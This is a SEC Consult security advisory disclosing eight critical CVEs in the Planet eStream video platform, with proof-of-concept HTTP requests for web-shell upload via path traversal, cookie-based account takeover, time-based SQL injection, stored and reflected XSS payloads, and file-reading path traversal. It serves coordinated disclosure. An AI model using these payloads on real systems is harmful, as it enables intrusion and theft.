SEC Consult Vulnerability Lab Security Advisory < 20221130-0 >
\n=======================================================================
\ntitle: Multiple critical vulnerabilities
\nproduct: Planet Enterprises Ltd – Planet eStream
\nvulnerable version: <6.72.10.07
\nfixed version: 6.72.10.07
\nCVE number: CVE-2022-45896, CVE-2022-45893, CVE-2022-45891,
\nCVE-2022-45889, CVE-2022-45892, CVE-2022-45890,
\nCVE-2022-45894, CVE-2022-45895
\nimpact: critical
\nhomepage: https:\/\/www.planetestream.co.uk
\nfound: 2022-09-01
\nby: Timon Vogel (Office Vienna)
\nPhilipp Espernberger (Office Linz)
\nHrvoje Filakovic (Office Osijek)
\nSEC Consult Vulnerability Lab<\/p>\n
An integrated part of SEC Consult, an Atos company
\nEurope | Asia | North America<\/p>\n
https:\/\/www.sec-consult.com<\/p>\n
=======================================================================<\/p>\n
Vendor description:
\n——————-
\n“Planet eStream is a powerfully simple and secure video platform,
\nmaking media more accessible and engaging for students and educators
\nacross secondary, further, and higher education”<\/p>\n
Source: https:\/\/www.planetestream.co.uk<\/p>\n
Business recommendation:
\n————————
\nThe vendor provides an update for the affected version which should
\nbe installed immediately.<\/p>\n
SEC Consult highly recommends to perform a thorough security review of the
\nPlanet eStream video streaming platform conducted by security
\nprofessionals to identify and resolve potential further security issues.<\/p>\n
Vulnerability overview\/description:
\n———————————–
\n1) Upload of Arbitrary Files Leading to Remote Code Execution (CVE-2022-45896)
\nThe application allows users to upload files at multiple places. It was
\nidentified that it is possible to upload arbitrary malicious files without any
\nrestriction and also without prior authentication! An attacker can upload
\na webshell and takeover the system.<\/p>\n
2) Account Takeover (CVE-2022-45893)
\nA problem identified in the cookie and session management of the web application
\nallows users with low privileges to bypass the authentication and authorization
\nmechanisms. They can be bypassed by changing the value of the ON cookie. In this way,
\nusers with low privileges can gain access to application features that are only accessible
\nto administrative and privileged users.<\/p>\n
3) Broken Access Control (CVE-2022-45891)
\nDue to flaws in the authorization scheme, an authorization bypass vulnerability
\nallows an attacker to get access to restricted functions of the web application.
\nThis can be leveraged to upload files to the web server without authentication
\nand gain access to restricted content that was uploaded by other users.<\/p>\n
4) SQL Injection (CVE-2022-45889)
\nDue to insufficient input validation, the application allows the injection of
\ndirect SQL commands. By exploiting the vulnerability, an attacker gains access
\nto all records stored in the database and can execute arbitrary SQL commands.<\/p>\n
5) Multiple Stored Cross-Site Scripting (XSS) (CVE-2022-45892)
\nUser input is not properly sanitized or encoded in various places. This leads to
\nseveral stored cross-site scripting (XSS) vulnerabilities. By exploiting this
\nvulnerability, an attacker can persistently embed arbitrary HTML or JavaScript
\ncode into the affected web page. The code is executed in the context of the
\nvictim’s browser when visiting the manipulated site. Additionally, users are
\npotential victims of browser exploits and JavaScript trojans.<\/p>\n
6) Reflected Cross-Site Scripting (XSS) (CVE-2022-45890)
\nOne of the application scripts returns unfiltered or unescaped user input. This
\nleads to a reflected cross-site scripting (XSS) vulnerability. With reflected
\ncross-site scripting, an attacker can inject arbitrary HTML or JavaScript code
\ninto the victim’s web browser. Once the victim clicks a malicious link, the
\nattacker’s code is executed in the context of the victim’s web browser. The
\nvulnerability can be used to change the contents of the displayed site or
\nredirect to other malicious sites. Additionally, users are potential
\nvictims of browser exploits and JavaScript trojans.<\/p>\n
7) Path Traversal (CVE-2022-45894)
\nAttackers can gain access to files and directories outside the web root through
\nthe use of relative file paths. In this case an authenticated
\nattacker with any role can inject “..\\” sequences into a certain URL parameter
\nin order to navigate through the file system and access local files.<\/p>\n
8) Information Disclosure (CVE-2022-45895)
\nParts of the application were discovered that disclose sensitive data to
\napplication users. While securely disclosing necessary information to authorized
\nusers will normally not present a security threat, the identified components
\ndisclose sensitive data that belongs to other users.<\/p>\n
Proof of concept:
\n—————–
\n1) Upload of Arbitrary Files Leading to Remote Code Execution (CVE-2022-45896)
\nVarious file upload vulnerabilities were identified in the web application. The
\nfollowing sections describe the vulnerabilities in detail.<\/p>\n
The file upload is restricted to certain file types in some cases. This
\nrestriction is only enforced in the frontend and can be bypassed by
\nintercepting the request and modifying it. There is no further validation of
\nuploaded files in the backend. Therefore, it is sufficient to change the
\nfilename ending in the intercepted request.<\/p>\n
a) File Upload with Path Traversal<\/p>\n
An authenticated attacker with the permission to attach documents to already
\nexisting content (e.g. videos) can upload any file. In some cases, the role
\nMember is sufficient. Under “Categories -> choose a video -> related Media” a new
\nmalicious file can be uploaded.<\/p>\n
The following POST request is sent to the server when a normal PNG file is uploaded:
\n===============================================================================
\nPOST \/Upload2.ashx?f=seclogo.png&c=0&l=53134&t=1662103112126&p=\\Temp&ut=0&tc=0&bs=53134&ct=1662103112126 HTTP\/2
\nHost: $host
\nCookie: […]\n
\u2030PNG
\n[…]\n===============================================================================<\/p>\n
Based on the previous POST request to upload files, the request can be
\nmanipulated to upload any content to any directory by using path traversal
\ntechniques. The following code shows the modified request. The content is
\nchanged from a PNG image to an ASP web shell. The filename ending is changed to
\nasp and the path is inserted into the p parameter, which is vulnerable to path
\ntraversal.
\n===============================================================================
\nPOST \/Upload2.ashx?f=webshell.asp&c=0&l=1024&t=1661943922096&p=..\\$path\\&ut=0&tc=0&bs=1024&ct=1661943922097 HTTP\/2
\nHost: $host
\nCookie: […]\n
$ASPWEBSHELL
\n===============================================================================<\/p>\n
As the following response shows, the file is being processed by the web server:
\n===============================================================================
\nHTTP\/2 200 OK
\nContent-Type: text\/plain; charset=utf-8
\nDate: Fri, 02 Sep 2022 07:16:11 GMT
\nContent-Length: 12<\/p>\n
progress:100
\n===============================================================================<\/p>\n
The web shell can now be accessed via the following URL:
\n===============================================================================
\nhttps:\/\/$host\/$path\/webshell.asp
\n===============================================================================<\/p>\n
An attacker now has the possibility to execute any command in context of the web
\nserver. Therefore, the web server is completely compromised.<\/p>\n
As described in chapter 3) Broken Access Control, section a) an unauthenticated
\nfile upload is possible if the attacker knows the correct request.<\/p>\n
b) General Upload<\/p>\n
An authenticated attacker with the permission to upload documents (role editor,
\npublisher or admin) can upload any file. Under “Create -> Upload -> Upload
\nDocument” a new malicious file can be uploaded.<\/p>\n
i) ASP Web Shell<\/p>\n
After choosing the malicious file for the file upload the following POST request
\nis sent to the web server:
\n===============================================================================
\nPOST \/Upload2.ashx?f=cmdasp.asp&c=0&l=1024&t=1661939611305&p=PreConversionMedia\\&ut=0&tc=0&bs=1024&ct=1661939611305 HTTP\/2
\nHost: $host
\nCookie: […]\nContent-Length: 1024<\/p>\n
$ASPWEBSHELL
\n===============================================================================<\/p>\n
As the following response shows, the file is being processed by the web server:
\n===============================================================================
\nHTTP\/2 200 OK
\nContent-Type: text\/plain; charset=utf-8
\nDate: Wed, 31 Aug 2022 09:53:31 GMT
\nContent-Length: 12<\/p>\n
progress:100
\n===============================================================================<\/p>\n
To finish the upload of the malicious file, an attacker simply needs to click
\nthe “Start Upload” button that becomes visible in the web interface.
\nAfter starting the upload, the following POST request is sent to the web server.<\/p>\n
===============================================================================
\nPOST \/Ajax.asmx\/ProcessUpload2 HTTP\/2
\nHost: $host
\nCookie: […]\nContent-Type: application\/json; charset=utf-8
\nX-Requested-With: XMLHttpRequest
\nContent-Length: 538<\/p>\n
{“fn”:”webshell.asp”,”ppid”:1,”isprivate”:1,”showera”:0,”catsinc”:””,”catsexc”:””,”retainsource”
\n:0,”copyonly”:0,”mediaprofile”:”0″,”fieldvalues”:”[{\\”FieldID\\”:1,\\”Type\\”:\\”txt\\”,\\”FieldValu
\ne\\”:\\”webshell\\”},{\\”FieldID\\”:2,\\”Type\\”:\\”txt\\”,\\”FieldValue\\”:\\”\\”},{\\”FieldID\\”:7,\\”Type\\”:\\
\n“ddl\\”,\\”FieldValue\\”:\\”4\\”},{\\”FieldID\\”:10,\\”Type\\”:\\”txt\\”,\\”FieldValue\\”:\\”\\”},{\\”FieldID\\
\n“:14,\\”Type\\”:\\”ddl\\”,\\”FieldValue\\”:\\”-1\\”},{\\”FieldID\\”:16,\\”Type\\”:\\”txt\\”,\\”FieldValue\\”:\\
\n“\\”}]”,”mobiledevice”:false,”rt”:10,”filenameastitle”:0,”expiry”:””}
\n===============================================================================<\/p>\n
The response of the web server discloses the new generated filename
\n8273~4u~vE7bUON0 as shown below.
\n===============================================================================
\nHTTP\/2 200 OK
\nContent-Type: application\/json; charset=utf-8
\nDate: Wed, 31 Aug 2022 09:53:31 GMT
\nContent-Length: 541<\/p>\n
{“d”:”{\\”Success\\”:true,\\”ClipDataID\\”:8273,\\”Position\\”:null,\\”TotalJobs\\”:0,\\”Message\\”:\\”Element
\nbereit\\”,\\”CopyOnlyFail\\”:false,\\”ViewURL\\”:\\”https:\/\/$host\/View.aspx?id=8273~4u~vE7bUON0\\”,
\n[…]\n}
\n===============================================================================<\/p>\n
After the filename is known the web shell can now be accessed via following URL:
\n===============================================================================
\nhttps:\/\/$host\/content\/8273_4u~vE7bUON0.asp
\n===============================================================================<\/p>\n
An attacker now has the possibility to execute any command in context of the web
\nserver. Therefore, the web server is completely compromised.<\/p>\n
ii) Malicious HTML File<\/p>\n
After choosing the malicious file, the following POST request is sent to the web
\nserver:
\n===============================================================================
\nPOST \/Upload2.ashx?f=secconsult.html&c=0&l=102&t=1661947994372&p=PreConversionMedia\\&ut=0&tc=0
\n&bs=102&ct=1661947994373 HTTP\/2
\nHost: $host
\nCookie: […]\nContent-Length: 1024<\/p>\n
<!DOCTYPE html>
\n<html>
\n<body>
\n<h1>SEC Consult Webpage<\/h1>
\n<p>hosted by $host<\/p>
\n<\/body>
\n<\/html>
\n===============================================================================<\/p>\n
As the following response shows, the file is being processed by the web server:
\n===============================================================================
\nHTTP\/2 200 OK
\nContent-Type: text\/plain; charset=utf-8
\nDate: Wed, 31 Aug 2022 12:13:13 GMT
\nContent-Length: 12<\/p>\n
progress:100
\n===============================================================================<\/p>\n
To finish the upload of the malicious file, an attacker simply needs to click
\nthe “Start Upload” button which pops up in the web interface.
\nAfter starting the upload, the following POST request is sent to the web server:
\n===============================================================================
\nPOST \/Ajax.asmx\/ProcessUpload2 HTTP\/2
\nHost: $host
\nCookie: […]\nContent-Type: application\/json; charset=utf-8
\nX-Requested-With: XMLHttpRequest
\nContent-Length: 539<\/p>\n
{“fn”:”secconsult.html”,”ppid”:1,”isprivate”:1,”showera”:0,”catsinc”:””,”catsexc”:””,”retainsou
\nrce”:0,”copyonly”:0,”mediaprofile”:”0″,”fieldvalues”:”[{\\”FieldID\\”:1,\\”Type\\”:\\”txt\\”,\\”Field
\nValue\\”:\\”secconsult\\”},{\\”FieldID\\”:2,\\”Type\\”:\\”txt\\”,\\”FieldValue\\”:\\”\\”},{\\”FieldID\\”:7,\\”T
\nype\\”:\\”ddl\\”,\\”FieldValue\\”:\\”4\\”},{\\”FieldID\\”:10,\\”Type\\”:\\”txt\\”,\\”FieldValue\\”:\\”\\”},{\\”F
\nieldID\\”:14,\\”Type\\”:\\”ddl\\”,\\”FieldValue\\”:\\”-1\\”},{\\”FieldID\\”:16,\\”Type\\”:\\”txt\\”,\\”FieldValue
\n\\”:\\”\\”}]”,”mobiledevice”:false,”rt”:10,”filenameastitle”:0,”expiry”:””}
\n===============================================================================<\/p>\n
The response of the web server discloses the new generated filename
\n8278~4z~b2w2tWQF as shown below.
\n===============================================================================
\nHTTP\/2 200 OK
\nContent-Type: application\/json; charset=utf-8
\nDate: Wed, 31 Aug 2022 12:13:14 GMT
\nContent-Length: 545<\/p>\n
{“d”:”{\\”Success\\”:true,\\”ClipDataID\\”:8278,\\”Position\\”:null,\\”TotalJobs\\”:0,\\”Message\\”:\\”Element
\nbereit\\”,\\”CopyOnlyFail\\”:false,\\”ViewURL\\”:\\”https:\/\/$host\/View.aspx?id=8278~4z~b2w2tWQF\\”,
\n[…]\n}
\n===============================================================================<\/p>\n
The HTML webpage can now be accessed via following URL:
\n===============================================================================
\nhttps:\/\/$host\/content\/8278_4z~b2w2tWQF.html
\n===============================================================================<\/p>\n
An attacker now has the possibility to infect the user’s browser with JavaScript
\nto execute any command in the context of the web server or can host webpages for
\nphishing attacks on the server of the Planet eStream instance.<\/p>\n
2) Account Takeover (CVE-2022-45893)
\nAn authenticated attacker with the role Member or Bypass can elevate their
\nprivileges by changing the ON cookie value. An attacker can easily brute force
\nthe value of the cookie due to the low entropy of the cookie or search for
\nleaked cookie values in the web application as described in chapter
\n8) Information Disclosure, section a).<\/p>\n
Based on the format of the cookie the following pattern was used to generate
\npossibly valid cookies.
\n===============================================================================
\n[0-1][AZ]~[azAZ][azAZ]\n===============================================================================<\/p>\n
To verify the vulnerability an authenticated session is required. Sessions that
\nare created by opening a sharing link to bypass authentication are sufficient.
\nTherefore, an attacker doesn\u2019t necessarily need a valid user account with valid
\ncredentials to gain privileged access.<\/p>\n
To abuse the vulnerability, an attacker can use the browser developer tool to
\npermanently change the value of the ON cookie. By changing the value of the
\nON cookie for example to $VALID_COOKIE, the current privileges are set to the
\nprivileges of the original user who has the ON cookie $VALID_COOKIE.<\/p>\n
An attacker can gain administrative privileges and access other accounts by
\nobtaining valid ON cookies for the respective accounts through brute force or
\ninformation disclosure.<\/p>\n
One essential aspect is that the ON cookie is persistent and never changes, not
\neven between sessions. Therefore, an attacker has permanent access to elevated
\nprivileges or other user accounts once a valid ON cookie is identified.<\/p>\n
3) Broken Access Control (CVE-2022-45891)
\na) Unauthenticated Upload<\/p>\n
As described in chapter 1) Upload of Arbitrary Files Leading to Remote Code
\nExecution an attacker has the possibility to upload arbitrary files. Once
\nattackers know the correct POST request to upload files, they can repeat the
\nsame request without prior authentication and successfully upload arbitrary
\nfiles. To verify the vulnerability the following request can be sent
\nunauthenticated (without cookies) to the web server.
\n===============================================================================
\nPOST \/Upload2.ashx?f=unauthenticated.txt&c=0&l=30&t=1662047867388&p=..\\..\\&ut=0&tc=0&bs=30&ct=1662047867388 HTTP\/2
\nHost: $host<\/p>\n
SEC Consult – upload
\n===============================================================================<\/p>\n
As the following response shows, the file is being processed by the web server:
\n===============================================================================
\nHTTP\/2 200 OK
\nDate: Mo, 19 Sep 2022 08:10:44 GMT
\nContent-Length: 12<\/p>\n
progress:100
\n===============================================================================<\/p>\n
The unauthenticated file upload was verified by identifying the file
\nunauthenticated.txt on the server.<\/p>\n
In conclusion, this vulnerability exacerbates the risk of the file upload
\nvulnerability. It increases the likelihood of exploitation since it enables an
\nattacker to upload files without authentication.<\/p>\n
b) Access Grant List<\/p>\n
An attacker needs to be authenticated with the role Member or Bypass to exploit
\nthe vulnerability. The vulnerability allows an attacker to modify the access
\nlist and grant himself access to private videos. Additionally, an attacker can
\nmake any video unavailable to other users by changing the access grant list.
\nThe vulnerability also applies to other content on the platform.<\/p>\n
To verify the vulnerability a video with restricted access is created. It can
\nbe accessed under the following URL:
\n===============================================================================
\nhttps:\/\/$host\/View.aspx?id=1337~4u~vE7bUKN5
\n===============================================================================<\/p>\n
By executing the POST request shown below, an attacker can add himself to the
\naccess grant list and gain access to the private video.
\n===============================================================================
\nPOST \/Ajax.asmx\/SaveGrantAccessList HTTP\/2
\nHost: $host
\nCookie: […]\nContent-Type: application\/json; charset=utf-8
\nContent-Length: 65<\/p>\n
{“cdid”:”1337″,”data”:”[{\\”Address\\”:\\”test@attacker.com\\”,\\”CanEdit\\”:true}]”}
\n===============================================================================<\/p>\n
The server responds with a status code 200 successful.
\n===============================================================================
\nHTTP\/2 200 OK
\nContent-Type: application\/json; charset=utf-8
\nDate: Thu, 01 Sep 2022 10:20:58 GMT
\n[…]\nContent-Length: 75<\/p>\n
{“d”:”{\\”Success\\”:true,\\”Message\\”:\\”Access list updated successfully\\”}”}
\n===============================================================================<\/p>\n
The user with the e-mail address test@attacker.com has been added to the
\naccess grant list and can view the private video with the ID 1337.<\/p>\n
The vulnerability can also be leveraged to block access to the video for other
\nusers (Denial-of-Service) by adding any malicious content “malicious_payload”
\ninstead of the valid e-mail address.<\/p>\n
4) SQL Injection (CVE-2022-45889)
\nTo demonstrate this vulnerability access to the search functionality in the
\nstatistic interface is required. An authenticated attacker with the role
\nPublisher or Admin can use the following GET request to reproduce the
\nvulnerability.
\n===============================================================================
\nGET \/Stats\/StatisticsResults.aspx?q=viewingday&p1=20220831&p2=&db1=stats&db2=clipdata&flt=+s_RecordTypeID+IN+(1)+;WAITFOR+DELAY+’0:0:5′– HTTP\/2
\nHost: $host
\nCookie: […]\n===============================================================================<\/p>\n
The resulting response took more than five seconds. Thus it can be
\nconcluded that an SQL injection is present.
\nFurthermore, exploitation by the tool sqlmap was possible and lead to a
\nsuccessful extraction of the complete backend database.<\/p>\n
5) Multiple Stored Cross-Site Scripting (XSS) (CVE-2022-45892)
\na) Disclaimer<\/p>\n
An attacker needs to be authenticated with the role Admin to exploit the stored
\nXSS vulnerability. The vulnerability will be executed afterwards for each user
\nwho logs into the web application. To verify the issue, an attacker needs to
\nmodify the disclaimer of the cookie description. In the admin section the
\nsystem options can be modified to change the disclaimer text.<\/p>\n
===============================================================================
\nhttps:\/\/$host\/Admin\/SystemOptions.aspx?disclaimer=1
\n===============================================================================<\/p>\n
By clicking the Source button, an admin user can inject a malicious payload.
\n===============================================================================
\n<img src=x onerror=javascript:alert(location.origin)\/\/”>
\n===============================================================================<\/p>\n
After saving the modified disclaimer text, the payload is executed by visiting
\ndifferent parts of the application. If a user visits the MyHome tab the payload
\nis triggered in the browser. The payload is also executed if a user hasn’t
\naccepted the disclaimer text yet, which is true for any new user.<\/p>\n
b) Search Function<\/p>\n
An attacker needs to be authenticated with the role Member to exploit the stored
\nXSS vulnerability. The vulnerability will be executed afterwards for each user,
\nwho inspects the statistic view provided by the web application. To verify the
\nissue, an attacker can search for following malicious payload that is then
\nautomatically stored in the database.
\n===============================================================================
\n<img onerror=”javascript:alert(location.origin)” src=”abcdef”;\/\/<
\n===============================================================================<\/p>\n
Afterwards, the malicious payload is triggered if a user lists the statistical
\ndata for the Search Breakdown in the last seven days.<\/p>\n
c) Comments<\/p>\n
An attacker needs to be authenticated with the role Member to exploit the stored
\nXSS vulnerability. The vulnerability will be executed afterwards for each user,
\nwho visits the content element that contains the malicious comment. To verify
\nthe issue, the following malicious payload can be injected into the public or
\nprivate comment field.
\n===============================================================================
\n<img onerror=”javascript:alert(location.origin)” src=”abcdef”;\/\/
\n===============================================================================<\/p>\n
d) Batch editing tool<\/p>\n
An attacker needs to be authenticated with the role Admin to exploit the stored
\nXSS vulnerability. The vulnerability will be executed afterwards for each user,
\nwho visits the modified content. To verify the issue, an attacker needs to
\nmodify the owner of the content. In the search section the admin has the
\npossibility to use the Batch-Editing tool.
\n===============================================================================
\nhttps:\/\/$host\/Default.aspx?search=consult&o=8&page=1&fp=0&report=1&rlt=0
\n===============================================================================<\/p>\n
By selecting the action Change owner, an admin user can inject a malicious
\npayload in the user input box.
\n===============================================================================
\n<img src=x onerror=javascript:alert(location.origin)\/\/”>
\n===============================================================================<\/p>\n
After injecting the malicious payload, the XSS payload is executed when the
\ncontent element is visited or when it appears in search results.
\n===============================================================================
\nhttps:\/\/$host\/Default.aspx?search=8298
\nhttps:\/\/$host\/View.aspx?id=8298~4B~dpa3P9mb&psid=136
\n===============================================================================<\/p>\n
e) Content Creation<\/p>\n
Permission to create content within the web application is required. Thus, an
\nattacker needs to be authenticated with the role Editor, Publisher, or Admin to
\nexploit the vulnerability. The issue can be verified by placing malicious HTML
\ncode in the title input field of the content creation dialog window. For this
\nthe following malicious payload can be used:
\n===============================================================================
\n<img src=’x’ onerror=’javascript:alert(location.origin)’ style=’
\n===============================================================================<\/p>\n
When the content creation progress is finished, the JavaScript code is
\npermanently stored in the web application. It will trigger in every browser that
\nvisits webpages that lists the modified item (for example, under the category
\nview, search results and content list).<\/p>\n
The following content upload possibilities are affected by this vulnerability:
\n– Upload Video or Audio files
\n– Upload Documents
\n– Add External Links
\n– Playlist
\n– Photoset<\/p>\n
f) Related Media<\/p>\n
HTML code can be injected in the title of the related media upload. Editing
\naccess to the content is required. This is normally the case for the users with
\nthe role Editors, Publishers or Admins. The malicious code can be injected in
\nthe title of the related content. To validate the vulnerability a new file must
\nbe uploaded in the related media tab. The next step is to change the filename
\nto inject the malicious HTML and JavaScript code.
\n===============================================================================
\n<img src=’x’ onerror=’javascript:alert(location.origin)’photo.png
\n===============================================================================<\/p>\n
When the title including the malicious payload is saved and the page reloaded,
\nthe payload within the title will be executed. The new title is stored in the
\nweb application along with the malicious HTML code. It will execute in any
\nbrowser that visits the content item. Opening the related media tab is not
\nnecessary.<\/p>\n
g) Create new user<\/p>\n
An attacker needs to be authenticated with the role Admin to exploit the stored
\nXSS vulnerability. The vulnerability will be executed afterwards for admin users
\nin the user section and for the created users once they are logged in. To verify
\nthe issue, an attacker needs to create a new user. Under Tools -> Admin ->
\nUsers, Permissions, Authentication -> Users the admin has the possibility to
\ncreate new users.
\n===============================================================================
\nhttps:\/\/$host\/Admin\/EditUser.aspx
\n===============================================================================<\/p>\n
The following malicious payload was added to the Full Name input field:
\n===============================================================================
\n<script>alert(location.origin)<\/script>
\n===============================================================================<\/p>\n
After creating the new user, the malicious payload gets executed once the new
\nuser logs in or the admin visits the user section (Tools -> Admin -> Users,
\nPermissions, Authentication -> Users).<\/p>\n
h) Change Username<\/p>\n
A cross-site scripting vulnerability can be found under https:\/\/$host\/MyHome.aspx
\nwhere a user can edit the name shown on his home page. All authenticated users
\ncan access home pages of other users and are thus affected by this vulnerability.
\nFurthermore, the vulnerability can be exploited by an authenticated user of any
\nrole. The following request was used to change the username.
\n===============================================================================
\nPOST \/Ajax.asmx\/SaveLayoutData HTTP\/2
\nHost: $host
\nCookie: […]\nContent-Length: 360
\nContent-Type: application\/json; charset=UTF-8
\n[…]\n
{“id”:$ID,”layoutdata”:”[{\\”title\\”:{\\”enabled\\”:true,\\”text\\”:\\”test<img
\nsrc=’x’ onerror=’alert(location.origin)’\\”,[…]\n===============================================================================<\/p>\n
The request is accepted by the web application as shown below:
\n===============================================================================
\nHTTP\/2 200 OK
\nContent-Type: application\/json; charset=utf-8
\nContent-Length: 92<\/p>\n
{“d”:”{\\”Success\\”:true,\\”Message\\”:\\”Layout erfolgreich gespeichert\\”,\\”HTML\\”:
\n[\\”455\\”]}”}
\n===============================================================================<\/p>\n
Sending the request directly bypasses the check for special characters like < or >
\nthat exist in the frontend. The malicious username string is embedded on the
\nwebsite and will execute when it is opened in the browser in any subsequent
\nrequest.<\/p>\n
6) Reflected Cross-Site Scripting (XSS) (CVE-2022-45890)
\nAn attacker needs authenticated access to the web application with the role
\nMember or higher to identify and exploit the vulnerability. To identify this
\nvulnerability, it is sufficient to open the following URL (no special manipulation
\nof the request is needed) and analyze the HTTP response from the web server:
\n===============================================================================
\nhttps:\/\/$host\/Default.aspx?search=test&page=1&fp=0&r=(0_7_0_%3Ch1%3ESEC%20Consult%3C\/h1%3E__)
\n===============================================================================<\/p>\n
The string SEC Consult is embedded in the webpage of this URL.
\nThe next step is to identify a working payload which triggers the cross-site
\nscripting vulnerability. To verify the vulnerability, it is sufficient to open
\nthe following URL:
\n===============================================================================
\nhttps:\/\/$host\/Default.aspx?search=*&o=8&page=1&fp=0&r=(0_7_0_%3Cscript%3Ealert(location.origin)%3C\/script%3E__)
\n===============================================================================<\/p>\n
Another working payload for the fo parameter was identified:
\n===============================================================================
\nhttps:\/\/$host\/Default.aspx?search=*&fo=%3Cimg%20onerror=%22javascript:alert(location.origin)%22%20src=%22abcdef%22;\/\/
\n===============================================================================<\/p>\n
It must be mentioned that all metadata filter fields are affected by this
\nvulnerability.<\/p>\n
7) Path Traversal (CVE-2022-45894)
\nAn attacker authenticated with the role Member can navigate to the vulnerable
\nURL path provided below and inject “..\\” sequences to move up directories on the
\nweb server and access local files.<\/p>\n
Simply navigating to the link with the injected path traversal payload an
\nattacker can download any file on the web server and read its contents.
\nTo verify the vulnerability the file NetSetup.LOG which contains details of the
\nentire process of joining the domain was downloaded. The following URL was used:
\n===============================================================================
\nhttps:\/\/$host\/GetFile.aspx?file=\/image\/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\debug\\NetSetup.LOG
\n===============================================================================<\/p>\n
8) Information Disclosure (CVE-2022-45895)
\na) ON cookie<\/p>\n
The information disclosure of the ON cookie was identified on three different
\npages of the web application. Since the cookie can be used to access other user
\naccounts with elevated privileges, it comprises highly confidential information.
\nIt is embedded in the web application’s response in different ways and there are
\nalways multiple cookies for different users in the response. Requests to obtain
\nthe sensitive information can be performed with authentication as arbitrary
\nuser.<\/p>\n
The ON cookie was embedded in three pages that are accessible under the
\nfollowing paths:
\n– \/Default.aspx?catid=69 (HTML)
\n– \/Default.aspx?search=*&o=8&page=1&report=1&rlt=0&export=1&t=1661787629149 (CSV)
\n– \/GetJson.aspx?t=1&display=3&data=69&source=2&o=8&title= (JSON)<\/p>\n
As an example the ON cookie leakage is shown in the HTML response. The cookie
\nvalue can be identified in the href and src attributes of the a element
\n($VALID_COOKIE).
\n===============================================================================
\n[…]\n<div><a title=”Open Media” tabindex=”-1″ href=”\/View.aspx?id=228~$VALID_COOKIE”>
\n<img title=”228″ data-alt-src=”” src=”\/Media\/Images\/ClipData\/228_$VALID_COOKIE.jpg”\/><\/a>
\n[…]\n===============================================================================<\/p>\n
b) WhoAmI<\/p>\n
The sensitive data comprises internal information that lets an attacker gain
\ndeeper knowledge about the application. To verify the vulnerability, it is
\nsufficient to request the following URL as authenticated user (any role):
\n===============================================================================
\nhttps:\/\/$host\/WhoAmI.aspx
\n===============================================================================<\/p>\n
An excerpt of the disclosed information is shown:
\n===============================================================================
\n<div […]>APPL_MD_PATH<\/div>[…]\/ROOT
\n<div […]>APPL_PHYSICAL_PATH<\/div>c:\\inetpub\\[…]\\
\n<div […]>LOCAL_ADDR<\/div>172.0.0.5
\n<div […]>PATH_TRANSLATED<\/div>c:\\inetpub\\[…]\\WhoAmI.aspx
\n<div […]>REMOTE_ADDR<\/div>172.0.255.6
\n<div […]>SERVER_PORT<\/div>443
\n<div […]>SERVER_PROTOCOL<\/div>HTTP\/1.1
\n<div […]>SERVER_SOFTWARE<\/div>Microsoft-IIS\/9.0
\n<div […]>Enable New UI<\/div>-1
\n<div […]>Enable New UI (Schema)<\/div>False
\n<div […]>Prop.OnMobileDevice<\/div>0
\n<div […]>UID<\/div>228
\n<div […]>Prop.MachineName<\/div>[…]\n<div […]>Demo Server<\/div>False
\n===============================================================================<\/p>\n
Vulnerable \/ tested versions:
\n—————————–
\nThe vulnerabilities have been found in version 6.72.07.04.<\/p>\n
Vendor contact timeline:
\n————————
\n2022-09-02: Submitting initial critical findings to vendor.
\n2022-10-03: Contacting vendor through direct email.
\n2022-10-03: Providing vendor with proof-of-concept.
\n2022-10-24: The new software version (6.72.09.29) with the security patches of the
\nreported vulnerabilities was tested by SEC Consult.
\n2022-10-24: SEC Consult could determine that the critical findings were fixed
\nappropriately and are no longer exploitable in the version (6.72.09.29).
\n2022-11-04: Following up with vendor.
\n2022-11-10: Follow up again.
\n2022-11-18: Vendor provided updated version number (6.72.10.07) which includes all
\nof the fixes.
\n2022-11-18: Vendor confirmed that all customers have been contacted and recommended
\nto update.
\n2022-11-25: Received CVE numbers.
\n2022-11-30: Coordinated release of security advisory.<\/p>\n
Solution:
\n———
\nThe vendor rolled out a new software version. Affected users should verify that
\nthey are using the latest version available v6.72.10.07 which fixes all
\nidentified security issues according to the vendor.<\/p>\n
Workaround:
\n———–
\nNone<\/p>\n
Advisory URL:
\n————-
\nhttps:\/\/sec-consult.com\/vulnerability-lab\/<\/p>\n
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n
SEC Consult Vulnerability Lab<\/p>\n
SEC Consult, an Atos company
\nEurope | Asia | North America<\/p>\n
About SEC Consult Vulnerability Lab
\nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
\nAtos company. It ensures the continued knowledge gain of SEC Consult in the
\nfield of network and application security to stay ahead of the attacker. The
\nSEC Consult Vulnerability Lab supports high-quality penetration testing and
\nthe evaluation of new offensive and defensive technologies for our customers.
\nHence our customers obtain the most current information about vulnerabilities
\nand valid recommendation about the risk profile of new technologies.<\/p>\n
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\nInterested to work with the experts of SEC Consult?
\nSend us your application https:\/\/sec-consult.com\/career\/<\/p>\n
Interested in improving your cyber security with the experts of SEC Consult?
\nContact our local offices https:\/\/sec-consult.com\/contact\/
\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n
Mail: security-research at sec-consult dot com
\nWeb: https:\/\/www.sec-consult.com
\nBlog: http:\/\/blog.sec-consult.com
\nTwitter: https:\/\/twitter.com\/sec_consult<\/p>\n
EOF T. Vogel, P. Espernberger \/ 2022<\/p>\n","protected":false},"excerpt":{"rendered":"
